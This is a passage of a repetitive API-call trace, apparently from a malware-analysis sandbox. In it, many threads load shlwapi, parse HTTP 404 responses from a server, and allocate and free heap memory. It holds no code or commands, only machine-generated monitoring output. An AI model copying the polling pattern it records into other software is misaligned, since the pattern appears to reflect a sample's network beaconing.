dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 229 os_tid = 0x13c [0211.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.049] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.049] GetProcessHeap () returned 0x6a0000 [0211.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0211.049] GetProcessHeap () returned 0x6a0000 [0211.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0211.049] GetProcessHeap () returned 0x6a0000 [0211.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 230 os_tid = 0x79c [0211.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.275] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.276] GetProcessHeap () returned 0x6a0000 [0211.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0211.276] GetProcessHeap () returned 0x6a0000 [0211.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0211.276] GetProcessHeap () returned 0x6a0000 [0211.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 231 os_tid = 0xb64 [0211.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.502] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.502] GetProcessHeap () returned 0x6a0000 [0211.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0211.502] GetProcessHeap () returned 0x6a0000 [0211.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0211.502] GetProcessHeap () returned 0x6a0000 [0211.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 232 os_tid = 0xb6c [0211.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.709] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.709] GetProcessHeap () returned 0x6a0000 [0211.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0211.709] GetProcessHeap () returned 0x6a0000 [0211.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0211.709] GetProcessHeap () returned 0x6a0000 [0211.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 233 os_tid = 0xaf0 [0211.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.944] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.945] GetProcessHeap () returned 0x6a0000 [0211.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0211.945] GetProcessHeap () returned 0x6a0000 [0211.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0211.945] GetProcessHeap () returned 0x6a0000 [0211.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 234 os_tid = 0xadc [0212.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.084] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.084] GetProcessHeap () returned 0x6a0000 [0212.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0212.084] GetProcessHeap () returned 0x6a0000 [0212.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0212.084] GetProcessHeap () returned 0x6a0000 [0212.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 235 os_tid = 0xda8 [0212.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.304] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.304] GetProcessHeap () returned 0x6a0000 [0212.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0212.304] GetProcessHeap () returned 0x6a0000 [0212.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0212.304] GetProcessHeap () returned 0x6a0000 [0212.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 236 os_tid = 0x5fc [0212.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.470] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.470] GetProcessHeap () returned 0x6a0000 [0212.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0212.470] GetProcessHeap () returned 0x6a0000 [0212.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0212.470] GetProcessHeap () returned 0x6a0000 [0212.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 237 os_tid = 0x650 [0212.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.732] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.732] GetProcessHeap () returned 0x6a0000 [0212.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0212.732] GetProcessHeap () returned 0x6a0000 [0212.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0212.732] GetProcessHeap () returned 0x6a0000 [0212.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 238 os_tid = 0x1328 [0212.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.946] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.946] GetProcessHeap () returned 0x6a0000 [0212.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0212.946] GetProcessHeap () returned 0x6a0000 [0212.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0212.946] GetProcessHeap () returned 0x6a0000 [0212.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 239 os_tid = 0x131c [0213.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.181] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.181] GetProcessHeap () returned 0x6a0000 [0213.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0213.181] GetProcessHeap () returned 0x6a0000 [0213.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0213.181] GetProcessHeap () returned 0x6a0000 [0213.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 240 os_tid = 0xeb0 [0213.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.463] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.463] GetProcessHeap () returned 0x6a0000 [0213.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0213.464] GetProcessHeap () returned 0x6a0000 [0213.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0213.464] GetProcessHeap () returned 0x6a0000 [0213.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 241 os_tid = 0xca4 [0213.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.675] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.675] GetProcessHeap () returned 0x6a0000 [0213.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0213.675] GetProcessHeap () returned 0x6a0000 [0213.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0213.675] GetProcessHeap () returned 0x6a0000 [0213.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 242 os_tid = 0x4e8 [0213.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.941] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.942] GetProcessHeap () returned 0x6a0000 [0213.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0213.942] GetProcessHeap () returned 0x6a0000 [0213.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0213.942] GetProcessHeap () returned 0x6a0000 [0213.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 243 os_tid = 0x8ec [0214.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.146] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.146] GetProcessHeap () returned 0x6a0000 [0214.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0214.146] GetProcessHeap () returned 0x6a0000 [0214.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0214.146] GetProcessHeap () returned 0x6a0000 [0214.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 244 os_tid = 0xc28 [0214.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.375] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.375] GetProcessHeap () returned 0x6a0000 [0214.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0214.375] GetProcessHeap () returned 0x6a0000 [0214.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0214.375] GetProcessHeap () returned 0x6a0000 [0214.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 245 os_tid = 0x958 [0214.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.616] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.616] GetProcessHeap () returned 0x6a0000 [0214.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0214.616] GetProcessHeap () returned 0x6a0000 [0214.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0214.616] GetProcessHeap () returned 0x6a0000 [0214.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 246 os_tid = 0x670 [0214.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.788] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.788] GetProcessHeap () returned 0x6a0000 [0214.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0214.788] GetProcessHeap () returned 0x6a0000 [0214.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0214.788] GetProcessHeap () returned 0x6a0000 [0214.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 247 os_tid = 0x668 [0215.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.037] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.037] GetProcessHeap () returned 0x6a0000 [0215.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0215.037] GetProcessHeap () returned 0x6a0000 [0215.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0215.037] GetProcessHeap () returned 0x6a0000 [0215.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 248 os_tid = 0x13e0 [0215.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.400] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.400] GetProcessHeap () returned 0x6a0000 [0215.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0215.400] GetProcessHeap () returned 0x6a0000 [0215.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0215.400] GetProcessHeap () returned 0x6a0000 [0215.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 249 os_tid = 0xc24 [0215.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.581] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.581] GetProcessHeap () returned 0x6a0000 [0215.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0215.581] GetProcessHeap () returned 0x6a0000 [0215.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0215.581] GetProcessHeap () returned 0x6a0000 [0215.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 250 os_tid = 0xe90 [0215.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.790] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.790] GetProcessHeap () returned 0x6a0000 [0215.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0215.790] GetProcessHeap () returned 0x6a0000 [0215.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0215.790] GetProcessHeap () returned 0x6a0000 [0215.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 251 os_tid = 0xfa8 [0216.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.283] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.284] GetProcessHeap () returned 0x6a0000 [0216.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0216.284] GetProcessHeap () returned 0x6a0000 [0216.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0216.284] GetProcessHeap () returned 0x6a0000 [0216.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 252 os_tid = 0x900 [0216.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.580] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.580] GetProcessHeap () returned 0x6a0000 [0216.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0216.580] GetProcessHeap () returned 0x6a0000 [0216.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0216.580] GetProcessHeap () returned 0x6a0000 [0216.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 253 os_tid = 0x458 [0216.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.829] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.831] GetProcessHeap () returned 0x6a0000 [0216.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0216.831] GetProcessHeap () returned 0x6a0000 [0216.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0216.831] GetProcessHeap () returned 0x6a0000 [0216.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 254 os_tid = 0xec4 [0217.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.076] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.076] GetProcessHeap () returned 0x6a0000 [0217.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0217.076] GetProcessHeap () returned 0x6a0000 [0217.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0217.076] GetProcessHeap () returned 0x6a0000 [0217.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 255 os_tid = 0xdec [0217.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.334] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.334] GetProcessHeap () returned 0x6a0000 [0217.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0217.334] GetProcessHeap () returned 0x6a0000 [0217.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0217.334] GetProcessHeap () returned 0x6a0000 [0217.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 256 os_tid = 0xc9c [0217.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.540] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.540] GetProcessHeap () returned 0x6a0000 [0217.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0217.541] GetProcessHeap () returned 0x6a0000 [0217.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0217.541] GetProcessHeap () returned 0x6a0000 [0217.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 257 os_tid = 0xc78 [0217.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.748] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.748] GetProcessHeap () returned 0x6a0000 [0217.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0217.748] GetProcessHeap () returned 0x6a0000 [0217.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0217.748] GetProcessHeap () returned 0x6a0000 [0217.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 258 os_tid = 0x1364 [0218.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.018] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.018] GetProcessHeap () returned 0x6a0000 [0218.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0218.018] GetProcessHeap () returned 0x6a0000 [0218.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0218.018] GetProcessHeap () returned 0x6a0000 [0218.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c66f8 | out: hHeap=0x6a0000) returned 1 Thread: id = 259 os_tid = 0xd34 [0218.269] LoadLibraryW (lpLibFileName="shlwapi") returned 